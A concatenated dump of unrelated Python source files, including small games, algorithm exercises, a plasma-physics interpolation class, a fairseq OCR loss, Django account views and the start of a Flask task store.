def sum_of_multiples(limit, factors=(3, 5)):
    """Return the sum of all integers below *limit* that are divisible by at
    least one of *factors* (each qualifying number counted once).

    Fixes: the original used a mutable default argument (``factors=[3, 5]``)
    and mutated it in place with ``remove(0)``, which also altered the
    caller's list and the shared default across calls.  Zero factors are now
    simply skipped without mutating the input.
    """
    usable = [f for f in factors if f != 0]
    return sum(i for i in range(limit) if any(i % f == 0 for f in usable))
991,221 | d4fd01cc92ae0f5ece8f14aff83b699044de849b | import random
class Dinosaur:
    """A combatant with three attacks of increasing power and energy cost."""

    def __init__(self, name):
        self.name = name
        self.health = 100
        # Attack i deals attack_power[i] damage and costs energy_drain[i] energy.
        self.attacks = ('Smash', 'Slash', 'Bite')
        self.attack_power = [30, 50, 70]
        self.energy = 40
        self.energy_drain = [0, 20, 30]

    def attack(self, robot):
        """Prompt the player for an attack (1-3) and apply it to *robot*."""
        attack_choice = int(input(f'Choose your attack: 1. Smash 2. Slash 3. Bite'))
        robot.health = robot.health - self.attack_power[attack_choice - 1]
        self.energy = self.energy - self.energy_drain[attack_choice - 1]

    def ai_attack(self, robot):
        """Apply a uniformly random attack to *robot* and report the damage.

        Fix: ``random.randint(0, 3)`` produced four values, and choice 0
        wrapped around via index -1, making 'Bite' twice as likely as the
        other attacks; ``randint(1, 3)`` picks each attack equally.
        """
        attack_choice = random.randint(1, 3)
        robot.health = robot.health - self.attack_power[attack_choice - 1]
        self.energy = self.energy - self.energy_drain[attack_choice - 1]
        print(f'{robot.name} was hit for {self.attack_power[attack_choice - 1]} damage!')
991,222 | aa7465408088a35ce3ec5ef044be4c409b63879e | """
(C) Copyright 2020
Scott Wiederhold, s.e.wiederhold@gmail.com
https://community.openglow.org
SPDX-License-Identifier: MIT
"""
if __name__ == '__main__':
    # Command-line utility: grab one frame from the Glowforge lid or head
    # camera and write the JPEG bytes to a file.
    import argparse
    from gfhardware.cam import capture, GFCAM_LID, GFCAM_HEAD
    parser = argparse.ArgumentParser(description='CaptureThread jpeg image from Glowforge camera.')
    parser.add_argument('--head', action='store_true',
                        help='CaptureThread from head camera [default: lid camera]')
    parser.add_argument('filename', action='store',
                        default="capture.jpeg", type=str,
                        nargs='?',
                        help='Specify output filename [default: capture.jpeg]')
    parser.add_argument('exposure', action='store',
                        default=3000, type=int,
                        nargs='?',
                        help='Specify exposure [range: 0-65535, default: 3000]')
    parser.add_argument('gain', action='store',
                        default=30, type=int,
                        nargs='?',
                        help='Specify gain [range: 0-1023, default: 30]')
    args = parser.parse_args()
    # Default to the lid camera; --head switches to the head camera.
    camera = GFCAM_LID
    if args.head:
        camera = GFCAM_HEAD
    # Write the captured frame as binary JPEG data.
    with open(args.filename, 'wb') as f:
        f.write(capture(camera, args.exposure, args.gain))
991,223 | 5724b65b05d9d67aa551ec680003e531223ca167 | import pandas as pd
from tqdm import tqdm
tqdm.pandas()

from utils import peak, ave, end


def _add_reference_features(frame, base_cols):
    """Append '<col>_peak', '<col>_ave' and '<col>_end' columns to *frame*.

    For every base column the row-wise peak/ave/end statistics (from utils)
    are computed over the whole frame and stored as new columns.  Returns
    the three lists of newly added column names (peak, ave, end), in input
    order.  Replaces three copy-pasted per-dataset loops.
    """
    peak_cols, ave_cols, end_cols = [], [], []
    for col in tqdm(base_cols):
        frame[col + '_peak'] = frame.progress_apply(peak, args=(frame, col,), axis=1)
        frame[col + '_ave'] = frame.progress_apply(ave, args=(frame, col,), axis=1)
        frame[col + '_end'] = frame.progress_apply(end, args=(frame, col,), axis=1)
        peak_cols.append(col + '_peak')
        ave_cols.append(col + '_ave')
        end_cols.append(col + '_end')
    return peak_cols, ave_cols, end_cols


# NOTE(review): each dataset is read from and written back to the SAME csv,
# so re-running the script keeps appending columns — confirm this is intended.
Session_2014_base_cols = ['QueryLength', 'QueryDwellTime', 'NewTerm', 'QuerySim',
                          'ClickCount', 'KeyDocCount', 'RelDocCount', 'AvgContent',
                          'TotalContent', 'AveClickRank', 'ClickDepth', 'SERPtime',
                          'RR', 'Clicks@3', 'Clicks@5', 'Clicks@5+', 'nDCG@3', 'nDCG@5',
                          'nDCG@10', 'Precision@3', 'Precision@5', 'Precision@10',
                          'Cost-Benefit-1', 'Cost-Benefit-1_1', 'Cost-Benefit-1_2',
                          'Cost-Benefit-2', 'Cost-Benefit-3']
Session_2014 = pd.read_csv('data/TREC-Session2014/Session2014_total_feature.csv')
(Session_2014_past_peak_cols, Session_2014_past_ave_cols,
 Session_2014_past_end_cols) = _add_reference_features(Session_2014, Session_2014_base_cols)
Session_2014.to_csv('data/TREC-Session2014/Session2014_total_feature.csv')

"""
=================================================================================================
Session_2013
=================================================================================================
"""
Session_2013_base_cols = ['QueryLength', 'QueryDwellTime', 'NewTerm', 'QuerySim',
                          'ClickCount', 'KeyDocCount', 'RelDocCount', 'AvgContent',
                          'TotalContent', 'AveClickRank', 'ClickDepth', 'SERPtime',
                          'RR', 'Clicks@3', 'Clicks@5', 'Clicks@5+', 'nDCG@3', 'nDCG@5',
                          'nDCG@10', 'Precision@3', 'Precision@5', 'Precision@10',
                          'AvgRelScore']
Session_2013 = pd.read_csv('data/TREC-Session2013/Session2013_total_feature.csv')
(Session_2013_past_peak_cols, Session_2013_past_ave_cols,
 Session_2013_past_end_cols) = _add_reference_features(Session_2013, Session_2013_base_cols)
Session_2013.to_csv('data/TREC-Session2013/Session2013_total_feature.csv')

"""
================================================================================================
THU-KDD19
================================================================================================
"""
THU_KDD19_base_cols = ['QueryLength', 'QueryDwellTime', 'NewTerm', 'QuerySim',
                       'ClickCount', 'QueryRelDocCount', 'QueryKeyDocCount',
                       'TaskRelDocCount', 'TaskKeyDocCount', 'QueryNDCG@3', 'QueryNDCG@5',
                       'QueryNDCG@10', 'TaskNDCG@3', 'TaskNDCG@5', 'TaskNDCG@10',
                       'QueryPrecision@3', 'QueryPrecision@5', 'QueryPrecision@10',
                       'TaskPrecision@3', 'TaskPrecision@5', 'TaskPrecision@10',
                       'Clicks@3', 'Clicks@5', 'Clicks@10', 'AveQueryRelScore',
                       'AveTaskRelScore', 'NewTerm', 'QuerySim', 'ClickDepth']
THU_KDD19 = pd.read_csv('data/THU-KDD19/KDD19_total_feature.csv')
(THU_KDD19_past_peak_cols, THU_KDD19_past_ave_cols,
 THU_KDD19_past_end_cols) = _add_reference_features(THU_KDD19, THU_KDD19_base_cols)
THU_KDD19.to_csv('data/THU-KDD19/KDD19_total_feature.csv')

statistic_cols = {'dataset': ['Session2014', 'Session2013', 'KDD19'],
                  'past_peak_cols': [Session_2014_past_peak_cols, Session_2013_past_peak_cols, THU_KDD19_past_peak_cols],
                  'past_ave_cols': [Session_2014_past_ave_cols, Session_2013_past_ave_cols, THU_KDD19_past_ave_cols],
                  'past_end_cols': [Session_2014_past_end_cols, Session_2013_past_end_cols, THU_KDD19_past_end_cols]}
statistic_cols = pd.DataFrame(statistic_cols)
statistic_cols.to_csv('data/data_with_refer_feature/statistic_cols.csv')
991,224 | 520c0a87714b0aab2b904bb9a2650ef927c15c73 | input = [line.rstrip() for line in open("day22/input.txt").readlines()] |
991,225 | 342812218443b40b4d1598dfff0f25170b85eb01 | import numpy as np
from . import ADAS_file as adas
from scipy import interpolate
from sdp.settings.unitsystem import SI
class Collisions:
r""" Class containing all the physics about the collisions
Read the files from ADAS database, compute the lifetime, and the cross-sections (cubic spline interpolation is used).
For computing the coefficients, two interpolations are done.
A first one in 2D (beam energy and density) and a second one in temperature.
The final result is given by:
.. math::
C = \frac{\text{Interp}(E_b,\rho)\cdot \text{Interp}(T)}{C_\text{ref}}
where :math:`C_\text{ref}` is the coefficient at the reference temperature, density and beam energy.
:param list[str] files_atte: List of names for ADAS21 files (beam stopping coefficient)
:param list[str] files_emis: List of names for ADAS22 files (emission coefficient)
:param list[int] states: Quantum number of the lower (states[0]) and the higher(states[1]) states of the hydrogen atom
:param float lifetime: Lifetime of the excited state
:var list[str] self.files_atte: List of names for ADAS21 files (beam stopping coefficient)
:var list[str] self.files_emis: List of names for ADAS22 files (emission coefficient)
:var list[] self.beam_atte: List of :class:`ADAS21 <sdp.plasma.collision.ADAS_file.ADAS21>` instance variable (beam stopping coefficient)
:var list[] self.beam_emis: List of :class:`ADAS22 <sdp.plasma.collision.ADAS_file.ADAS22>` instance variable (emission coefficient)
:var list[tck_interp] self.atte_tck_dens: List of interpolant computed with cubic spline for the beam stopping coefficient as a function of the density and the beam energy
:var list[tck_interp] self.emis_tck_dens: List of interpolant computed with cubic spline for the emission coefficient as a function of the density and the beam energy
:var list[tck_interp] self.atte_tck_temp: List of interpolant computed with cubic spline for the beam stopping coefficient as a function of the temperature
:var list[tck_interp] self.emis_tck_temp: List of interpolant computed with cubic spline for the emission coefficient as a function of the temperature
:var float self.n_low: Quantum number of the lower state for the hydrogen atom
:var float self.n_high: Quantum number of the higher state for the hydrogen atom
:var float self.E0: Energy of the ground state (in eV)
:var float self.lifetime: Lifetime of the excited state
"""
def __init__(self,files_atte,files_emis,states,lifetime):
    """ Copy the input inside the instance and precompute the interpolants.

    :param list[str] files_atte: List of names for ADAS21 files (beam stopping coefficient)
    :param list[str] files_emis: List of names for ADAS22 files (emission coefficient)
    :param list[int] states: Quantum number of the lower (states[0]) and the higher (states[1]) states of the hydrogen atom
    :param float lifetime: Lifetime of the excited state
    """
    self.files_atte = files_atte #!
    self.files_emis = files_emis #!
    self.beam_emis = [] #!
    self.beam_atte = [] #!
    print('The wavelength assumes an hydrogen atom')
    self.n_low = states[0] #!
    self.n_high = states[1] #!
    self.E0 = -13.6  # hydrogen ground-state energy (eV)
    self.lifetime = lifetime
    self.read_adas()
    # compute the interpolant (beam energy and density axes in log space)
    self.atte_tck_dens = [] #!
    self.emis_tck_dens = [] #!
    self.atte_tck_temp = [] #!
    self.emis_tck_temp = [] #!
    for i in range(len(self.beam_atte)):
        # get data
        ldensities = np.log(self.get_list_density('atte',i))
        lbeams = np.log(self.get_list_beams('atte',i))
        coef_dens = self.get_coef_density('atte',i)
        lbeams, ldens = np.meshgrid(lbeams, ldensities)
        # interpolation over beam and density (bilinear spline, kx=ky=1)
        self.atte_tck_dens.append(interpolate.bisplrep(
            lbeams,ldens,coef_dens,kx=1,ky=1))
        # get data for the interpolation in temperature
        T = np.log(self.get_list_temperature('atte',i))
        coef_T = self.get_coef_T('atte',i)
        Tref = np.log(self.get_Tref('atte',i))
        # locate the reference temperature within the tabulated grid so the
        # temperature spline is normalised to 1 at T = Tref
        index = abs((Tref-T)/Tref) < 1e-4
        #interpolation over the temperature
        self.atte_tck_temp.append(interpolate.splrep(
            T,coef_T/coef_T[index],k=1))
    for i in range(len(self.beam_emis)):
        # get data (same scheme as above, for the emission coefficient)
        ldensities = np.log(self.get_list_density('emis',i))
        lbeams = np.log(self.get_list_beams('emis',i))
        coef_dens = self.get_coef_density('emis',i)
        lbeams, ldens = np.meshgrid(lbeams, ldensities)
        # interpolation over beam and density
        self.emis_tck_dens.append(interpolate.bisplrep(
            lbeams,ldens,coef_dens,kx=1,ky=1))
        # Get data for the interpolation in temperature
        T = np.log(self.get_list_temperature('emis',i))
        coef_T = self.get_coef_T('emis',i)
        Tref = np.log(self.get_Tref('emis',i))
        index = abs((Tref-T)/Tref) < 1e-4
        #interpolation over the temperature
        self.emis_tck_temp.append(interpolate.splrep(
            T,coef_T/coef_T[index],k=1))
def read_adas(self):
""" Read the ADAS files and stores them as attributes (used during the initialization)
"""
for name in self.files_atte:
self.beam_atte.append(adas.ADAS21(name))
for name in self.files_emis:
self.beam_emis.append(adas.ADAS22(name))
    def get_attenutation(self,beam,ne,mass_b,Ti,file_number):
        """ Get the beam stopping coefficient for a given density, beam energy, and temperature.
        The ADAS database store the data as two array, for putting them together, we do a first
        interpolation for the 2D array (as a function of density and beam energy) and after
        we do a scaling with the temperature.
        :param float beam: Beam energy (eV)
        :param float or np.array[N] ne: Electron density density
        :param float mass_b: mass of a neutral particle in the beam (amu)
        :param float or np.array[N] Ti: Ion temperature (should be of the same lenght than ne)
        :param int file_number: File number wanted (choosen by beam.py)
        :returns: Beam stopping coefficient
        :rtype: np.array[ne.shape]
        """
        # ADAS tabulates against energy per nucleon; interpolants live in log space
        beam = np.log(beam/mass_b)
        ne = np.log(ne)
        Ti = np.log(Ti)
        if len(ne.shape) == 1:
            # bisplev does not evaluate on an arbitrary list of (x, y) pairs,
            # so evaluate the 2D spline point by point along the density vector
            coef = np.zeros(ne.shape)
            for i,n in enumerate(ne):
                coef[i] = interpolate.bisplev(beam,n,self.atte_tck_dens[file_number])
        else:
            coef = interpolate.bisplev(beam,ne,self.atte_tck_dens[file_number])
        # rescale by the (Tref-normalised) temperature dependence
        coef = coef * interpolate.splev(Ti,self.atte_tck_temp[file_number])
        return coef
    def get_emission(self,beam,ne,mass_b,Ti,file_number):
        """ Get the emission coefficient for a given density, beam energy, and temperature.
        The ADAS database store the data as two array, for putting them together, we do a first
        interpolation for the 2D array (as a function of density and beam energy) and after
        we do a scaling with the temperature.
        :param float beam: Beam energy (eV)
        :param float or np.array[N] ne: Electron density density
        :param float mass_b: mass of a neutral particle in the beam (amu)
        :param float or np.array[N] Ti: Ion temperature (should be of the same lenght than ne)
        :param int file_number: File number wanted (choosen by beam.py)
        :returns: Emission coefficient
        :rtype: np.array[ne.shape]
        """
        # ADAS tabulates against energy per nucleon; interpolants live in log space
        beam = np.log(beam/mass_b)
        ne = np.log(ne)
        Ti = np.log(Ti)
        # NOTE(review): this scalar test differs from the shape test used in
        # get_attenutation -- presumably both mean "scalar vs vector"; confirm.
        if not isinstance(ne,float):
            # evaluate the 2D spline point by point along the density vector
            coef = np.zeros(len(ne))
            for i in range(len(ne)):
                coef[i] = interpolate.bisplev(beam,ne[i],self.emis_tck_dens[file_number])
        else:
            coef = interpolate.bisplev(beam,ne,self.emis_tck_dens[file_number])
        # rescale by the (Tref-normalised) temperature dependence
        coef = coef * interpolate.splev(Ti,self.emis_tck_temp[file_number])
        return coef
def get_Tref(self,typ,file_number):
""" Return the reference temperature of the attenuation[beam stopping\
coefficient]/emission file
:param str typ: Choice of the type of file ('emis' or 'atte')
:param int file_number: File number (choosen in beam.py)
:returns: Reference temperature
:rtype: float
"""
if typ == 'emis':
return self.beam_emis[file_number].T_ref
elif typ == 'atte':
return self.beam_atte[file_number].T_ref
else:
raise NameError('No list with this name: {0}'.format(typ))
def get_coef_density(self,typ,file_number):
""" Return the coefficient as a function of the density and the beam energy\
of the attenuation[beam stopping coefficient]/emission file
:param str typ: Choice of the type of file ('emis' or 'atte')
:param int file_number: File number (choosen in beam.py)
:returns: Coefficient as a function of the density and the beam energy
:rtype: np.array[Ndens,Nbeam]
"""
if typ == 'emis':
return self.beam_emis[file_number].coef_dens
elif typ == 'atte':
return self.beam_atte[file_number].coef_dens
else:
raise NameError('No list with this name: {0}'.format(typ))
def get_coef_T(self,typ,file_number):
""" Return the coefficient as a function of the temperature\
of the attenuation[beam stopping coefficient]/emission file
:param str typ: Choice of the type of file ('emis' or 'atte')
:param int file_number: File number (choosen in beam.py)
:returns: Coefficient as a function of the temperature
:rtype: np.array[N]
"""
if typ == 'emis':
return self.beam_emis[file_number].coef_T
elif typ == 'atte':
return self.beam_atte[file_number].coef_T
else:
raise NameError('No list with this name: {0}'.format(typ))
def get_list_temperature(self,typ,file_number):
""" Return the temperatures used in the ADAS file for\
the attenuation[beam stopping coefficient]/emission file
:param str typ: Choice of the type of file ('emis' or 'atte')
:param int file_number: File number (choosen in beam.py)
:returns: Temperatures computed in the ADAS file
:rtype: np.array[N]
"""
if typ == 'emis':
return self.beam_emis[file_number].temperature
elif typ == 'atte':
return self.beam_atte[file_number].temperature
else:
raise NameError('No list with this name: {0}'.format(typ))
def get_list_density(self,typ,file_number):
""" Return the densities used in the ADAS file for\
the attenuation[beam stopping coefficient]/emission file
:param str typ: Choice of the type of file ('emis' or 'atte')
:param int file_number: File number (choosen in beam.py)
:returns: Densities computed in the ADAS file
:rtype: np.array[N]
"""
if typ == 'emis':
return self.beam_emis[file_number].densities
elif typ == 'atte':
return self.beam_atte[file_number].densities
else:
raise NameError('No list with this name: {0}'.format(typ))
def get_list_beams(self,typ,file_number):
""" Return the beam energies used in the ADAS file for\
the attenuation[beam stopping coefficient]/emission file
:param str typ: Choice of the type of file ('emis' or 'atte')
:param int file_number: File number (choosen in beam.py)
:returns: Beam energies computed in the ADAS file
:rtype: np.array[N]
"""
if typ == 'emis':
# multiply by the mass due to ADAS
return self.beam_emis[file_number].adas_beam
elif typ == 'atte':
return self.beam_atte[file_number].adas_beam
else:
raise NameError('No list with this name: {0}'.format(typ))
def get_lifetime(self,ne,Te,beam,mass_b,file_number):
""" Compute the lifetime of the excited state.
This version is using the lifetime given in the input but can be upgraded in order
to have a plasma dependant lifetime.
:todo: Upgrading in order to take into account the plasma density
:param float beam: Beam energy (eV)
:param np.array[N] ne: Electron density (m :sup:`-3`)
:param float mass_b: Mass of a neutral particle in the beam (amu)
:param np.array[N] Te: Electron temperature (eV)
:param int file_number: File number (choosen in Beam.py)
:returns: Lifetime of the excited atom
:rtype: np.array[ne.shape]
"""
return self.lifetime*np.ones(ne.shape)
def get_wavelength(self):
""" Compute the wavelength of the emitted photons in the particles
reference frame (assume an hydrogen atom).
:returns: Wavelength emitted in reference frame (nm)
:rtype: float
"""
E = -self.E0*(1.0/self.n_low**2 - 1.0/self.n_high**2)
return SI['hc']*1e12/(E*SI['keV'])
if __name__ == '__main__':
    'small test and example'
    import matplotlib.pyplot as plt
    # check the computation of the lifetime
    path = 'sdp/diagnostic/bes/'
    # NOTE(review): __init__ takes 4 arguments (the last being lifetime) but
    # only 3 are passed here -- this demo likely raises TypeError; confirm.
    col = Collisions([path+'bms10#h_h1.dat'],[path+'bme10#h_h1.dat'],[2, 3])
    Ebeam = col.beam_atte[0].E_ref
    dens = col.beam_atte[0].densities
    T = col.beam_atte[0].temperature
    # lifetime over the full (temperature, density) grid
    lifetime = np.zeros((T.shape[0],dens.shape[0]))
    for i,t in enumerate(T):
        # NOTE(review): get_lifetime takes (ne, Te, beam, mass_b, file_number)
        # but six values are passed here -- confirm the intended call.
        lifetime[i,:] = col.get_lifetime(dens,t,t,Ebeam,1.0,0)
    plt.figure()
    plt.contourf(dens,T,lifetime)
    plt.colorbar()
    plt.show()
    'small check for the emission and the beam stopping coefficient'
    ne = np.linspace(np.min(dens),np.max(dens),1000)
    t_ref = T[4]
    at = col.get_attenutation(Ebeam,ne,1.0,t_ref,0)
    em = col.get_emission(Ebeam,ne,1.0,t_ref,0)
    # Negative coefficients indicate a problem in the interpolation or the files
    if ((at < 0) | (em < 0)).any():
        print(np.sum(at<0),at[at<0])
        print(np.sum(em<0),em[em<0])
        plt.figure()
        plt.semilogx(ne,em<0,label='emission')
        plt.semilogx(ne,at<0,label='attenuation')
        plt.semilogx(dens,dens>0,'x')
        plt.legend()
        plt.figure()
        plt.semilogx(ne,em)
        plt.show()
        raise NameError('Error in the interpolation or in the ADAS file')
|
991,226 | bcd4101ed1f75887eb951787172a691783b69406 | class Solution:
def flipAndInvertImage(self, A):
for index, value in enumerate(A):
A[index] = value[::-1]
for i in range(len(A)):
for j in range(len(A[0])):
A[i][j] = (A[i][j]+1)%2
return A
# 这个列表生成式和异或操作用的很6
def flipAndInvertImage1(self, A):
return [[1 ^ i for i in row[::-1]] for row in A]
# Smoke test: flip + invert a sample 4x4 binary image
a = Solution()
print(a.flipAndInvertImage([[1,1,0,0],[1,0,0,1],[0,1,1,1],[1,0,1,0]]))
991,227 | 07ea0862aa853ef551fdbcb3bf82c836ffd97300 | """
2D Array - DS
THis function should take a random 6x6 array and postion wise get a sum of all of the elements in the
"""
import traceback
def hourglass_max_sum(d_array: list) -> int:
    """Return the maximum hourglass sum in a 6x6 grid.

    An hourglass anchored at (r, c) covers:
        a[r][c]   a[r][c+1]   a[r][c+2]
                  a[r+1][c+1]
        a[r+2][c] a[r+2][c+1] a[r+2][c+2]

    :param d_array: 6x6 list of lists of ints (values may be negative).
    :returns: the largest hourglass sum among the 16 possible anchors.

    Fixes over the previous version: the maximum was initialised to 0 (wrong
    for all-negative grids), the sliding-window bookkeeping skipped positions,
    and debug prints leaked to stdout.
    """
    best = None
    # 4x4 anchor positions cover every hourglass in a 6x6 grid
    for r in range(4):
        for c in range(4):
            total = (d_array[r][c] + d_array[r][c + 1] + d_array[r][c + 2]
                     + d_array[r + 1][c + 1]
                     + d_array[r + 2][c] + d_array[r + 2][c + 1] + d_array[r + 2][c + 2])
            if best is None or total > best:
                best = total
    return best
if __name__ == "__main__":
test_list = [
[1, 1, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0],
[1, 1, 1, 0, 0, 0],
[0, 0, 2, 4, 4, 0],
[0, 0, 0, 2, 0, 0],
[0, 0, 1, 2, 4, 0]
]
test_list_2=[
[-9, -9, -9, 1, 1, 1],
[0, -9, 0, 4, 3, 2],
[-9, -9, -9, 1, 2, 3],
[0, 0, 8, 6, 6, 0],
[0, 0, 0, -2, 0, 0],
[0, 0, 1, 2, 4, 0]
]
print(hourglass_max_sum(test_list)) |
991,228 | fee1452b9b047ccd0f941c3ebd1766337f60f524 | """Given a 26 letter character set, which is equivalent to character
set of English alphabet i.e. (abcd….xyz) and act as a relation.
We are also given several sentences and we have to translate them with
the help of given new character set."""
# utf-8
def newString(charset, input):
    """Print *input* translated through the custom alphabet.

    ``charset`` is a 26-letter permutation acting as the relation: its i-th
    character maps to the i-th letter of 'a'..'z'.  Raises KeyError if the
    input contains a character outside the charset.
    """
    alphabet = "abcdefghijklmnopqrstuvwxyz"
    translation = dict(zip(charset, alphabet))
    translated = [translation[ch] for ch in input]
    print("".join(translated))
if __name__ == "__main__":
charSet = 'qwertyuiopasdfghjklzxcvbnm'
input = 'utta'
newString(charSet,input)
|
991,229 | 36c61ac4c46d0fd24c275c3bb92bc1bda8de1542 | #!/usr/bin/env python
HELP = """
[hh] Help
[qq] Quit
[rr] Reset
Input (Letters): <a-z>...
"""
WORDS = [
'about', 'after', 'again', 'below', 'could',
'every', 'first', 'found', 'great', 'house',
'large', 'learn', 'never', 'other', 'place',
'plant', 'point', 'right', 'small', 'sound',
'spell', 'still', 'study', 'their', 'there',
'three', 'thing', 'think', 'three', 'water',
'where', 'which', 'world', 'would', 'write',
]
def run():
    # Interactive word filter (Python 2): each round the player enters the
    # letters that may occupy position i; any candidate whose i-th letter is
    # not among them is discarded.  'hh'/'qq'/'rr' are commands.
    i, words = 0, set(WORDS)
    while True:
        _input = raw_input("[SIGNAL] #{} Letters: ".format(i+1))
        if not _input:
            continue
        if _input == 'hh':
            print HELP
            continue
        if _input == 'qq':
            break
        if _input == 'rr':
            # Reset both the position counter and the candidate set
            i, words = 0, set(WORDS)
            print "Restarted"
            continue
        letters = set(_input)
        # Iterate over a copy so we can discard while looping
        for w in list(words):
            if w[i] not in letters:
                words.discard(w)
        print "Possible Answers: ", list(words)
        # NOTE(review): i grows without bound; a 6th letter round would raise
        # IndexError on w[i] since all words are 5 letters -- confirm intended.
        i += 1
def main():
    # Entry point: start the interactive filtering loop
    run()

if __name__ == "__main__":
    main()
|
991,230 | 43297ff15d5fd3695d0026a3bb5917d627cef411 | import torch
import torch.nn.functional as F
from fairseq.criterions import FairseqCriterion, register_criterion
@register_criterion('ocrseq_loss')
class OCRSeqLossCriterion(FairseqCriterion):
    """Joint OCR training loss: CTC on the encoder output plus NLL
    (cross-entropy) on the decoder output."""

    def __init__(self, args, task):
        # NOTE(review): this calls FairseqCriterion's *parent* __init__,
        # deliberately skipping FairseqCriterion.__init__ -- presumably to
        # bypass its argument handling; confirm against the fairseq version.
        super(FairseqCriterion, self).__init__()
        self.args = args
        # CTC blank symbol and padding index from the target dictionary
        self.blank_idx = task.target_dictionary.blank()
        self.padding_idx = task.target_dictionary.pad()

    def forward(self, model, sample, reduction='mean'):
        """Compute the loss for the given sample.
        Returns a tuple with three elements:
        1) the loss
        2) the sample size, which is used as the denominator for the gradient
        3) logging outputs to display while training
        """
        net_output = model(**sample['net_input'])
        # Encoder output feeds the CTC loss, decoder output the NLL loss
        net_output_middle = net_output['encoder_output']
        net_output_final, _ = net_output['decoder_output']
        loss = self.compute_loss_ctc(model, net_output_middle, sample, reduction=reduction) + \
            self.compute_cross_entropy_loss(model, net_output_final, sample)
        sample_size = sample['nsentences'] if self.args.sentence_avg else sample['ntokens']
        logging_output = {
            'loss': loss.item(),
            'ntokens': sample['ntokens'],
            'nsentences': sample['nsentences'],
            'sample_size': sample_size,
        }
        return loss, sample_size, logging_output

    def compute_cross_entropy_loss(self, model, net_output, sample, reduce=True):
        """NLL loss on the decoder log-probabilities, ignoring padding."""
        lprobs = model.get_normalized_probs(net_output, log_probs=True)
        lprobs = lprobs.view(-1, lprobs.size(-1))
        target = sample['target'].view(-1)
        loss = F.nll_loss(
            lprobs,
            target,
            ignore_index=self.padding_idx,
            reduction='mean' if reduce else 'none',
        )
        return loss

    def compute_loss_ctc(
        self, model, net_output, sample,
        reduction='mean', zero_infinity=False,
    ):
        """CTC loss on the encoder log-probabilities.

        All encoder frames are assumed usable: every input length is set to
        the full time dimension of the log-probs.
        """
        log_probs = model.get_normalized_probs(net_output, log_probs=True)
        targets = torch.cat(sample['target_simply'])  # Expected targets to have CPU Backend
        target_lengths = sample['target_length']
        input_lengths = torch.full((sample['nsentences'],), log_probs.size(0), dtype=torch.int32)
        loss = F.ctc_loss(log_probs, targets, input_lengths, target_lengths,
                          blank=self.blank_idx, reduction=reduction,
                          zero_infinity=zero_infinity)
        return loss

    @staticmethod
    def aggregate_logging_outputs(logging_outputs):
        """Aggregate logging outputs from data parallel training."""
        # NOTE(review): only the first worker's log is used (see the disabled
        # assert); with more than one worker the aggregate under-reports.
        # assert len(logging_outputs) == 1
        log = logging_outputs[0]
        loss = log.get('loss', 0)
        ntokens = log.get('ntokens', 0)
        batch_sizes = log.get('nsentences', 0)
        sample_size = log.get('sample_size', 0)
        agg_output = {
            'loss': loss,
            'ntokens': ntokens,
            'nsentences': batch_sizes,
            'sample_size': sample_size,
        }
        return agg_output
|
991,231 | b31ec74fc907ae955ec8019fe515df3eeeb9e9e0 | from django.shortcuts import render
from django.views.generic import View
from django.http import HttpResponseRedirect
from django.urls import reverse
import random
import string
from kimo.models import Device, Copil
from kimo.models import Copil
from kimo.models import Legatura
from settings import SESSION_USER_ID_FIELD_NAME
class AccountSettings(View):
    """Account settings landing page: renders the bare base template."""
    def get(self, request):
        return render(request, 'kimo/base.html')
class Child(View):
    """Step 1 of adding a child: collect the name and hand off to Token.

    Fix: the original post() contained a large chunk of dead code after the
    ``return`` (raw-SQL creation of Copil/Legatura rows) that could never
    execute and duplicated what Token.get already does; it has been removed.
    """

    def get(self, request):
        return render(request, 'account_settings/child.html')

    def post(self, request):
        """Stash the submitted names in the session and redirect to the token
        step; on any error, re-render the form with the exception."""
        try:
            firstname = request.POST.get('firstname')
            lastname = request.POST.get('lastname')
            request.session['child_firstname'] = firstname
            request.session['child_lastname'] = lastname
            return HttpResponseRedirect(reverse('account_settings:token'))
        except Exception as exc:
            e = exc
            return render(request, 'account_settings/child.html', context={
                'error': e
            })
class Token(View):
    """Step 2 of adding a child: create the records and show the pairing token.

    Fix: the session-cleanup path used a bare ``except: pass`` which would
    swallow any error; only the expected KeyError is caught now.
    """

    def get(self, request):
        firstname = request.session.get('child_firstname')
        lastname = request.session.get('child_lastname')
        if firstname and lastname:
            # Consume the names so a refresh cannot create duplicates
            del request.session['child_firstname']
            del request.session['child_lastname']
            # 6-character alphanumeric pairing token for the child's device
            token = ''.join(random.choices(string.ascii_letters + string.digits, k=6))
            Copil.objects.create(prenume=firstname, nume=lastname)
            c = Copil.objects.filter(prenume=firstname, nume=lastname)[0]
            Device.objects.create(id_copil=c.id, token=token)
            Legatura.objects.create(id_copil=c.id, id_parinte=request.session[SESSION_USER_ID_FIELD_NAME])
            return render(request, 'account_settings/token.html', context={
                'childname': firstname,
                'childlastname': lastname,
                'token': token
            })
        try:
            del request.session['child_firstname']
            del request.session['child_lastname']
        except KeyError:
            # One or both keys were never set; nothing to clean up.
            pass
        return HttpResponseRedirect(reverse('account_settings:add_child'))
class Pass(View):
    """Password-change form.

    NOTE(review): post() only reads and prints the submitted password; no
    user record is updated, yet 'Success' is reported -- confirm whether the
    actual change is implemented elsewhere.
    """
    def get(self, request):
        return render(request, 'account_settings/change_password.html')

    def post(self,request):
        # 'error' doubles as a status message on success
        e='Success'
        try:
            new_password=request.POST.get('password')
            print(new_password)
        except Exception as exc:
            e = exc
        return render(request, 'account_settings/change_password.html', context={
            'error': e,
        })
|
# Print the two files side by side, one line from each per iteration;
# iteration stops at the shorter file.
with open('./doc.txt') as first, open('./docie.txt') as second:
    for left, right in zip(first, second):
        print(left + right)
991,233 | c4538f013f8f8d7f310da668f0d29201055f6b10 | import abc
import argparse
import json
import re
import psycopg2
from flask import (
Flask,
request,
make_response,
)
app = Flask(__name__)
class TaskStore(metaclass=abc.ABCMeta):
    """Abstract interface that every task storage backend implements."""

    @abc.abstractmethod
    def add(self, summary, description):
        # Create a task and return its new id
        pass

    @abc.abstractmethod
    def get_task(self, task_id):
        # Return the task dict, or None if the id is unknown
        pass

    @abc.abstractmethod
    def delete_task(self, task_id):
        # Return True iff the task existed and was removed
        pass

    @abc.abstractmethod
    def update_task(self, task_id, summary, description):
        # Return True iff the task existed and was updated
        pass

    @abc.abstractmethod
    def all_tasks(self):
        # Iterate over every stored task dict
        pass
class MemoryTaskStore(TaskStore):
    """In-memory TaskStore: tasks live in a dict keyed by auto-incrementing ids."""

    def __init__(self):
        self._init_store()

    def new_id(self):
        """Return the next task id; ids start at 0 and never repeat until clear()."""
        assigned = self._last_id
        self._last_id += 1
        return assigned

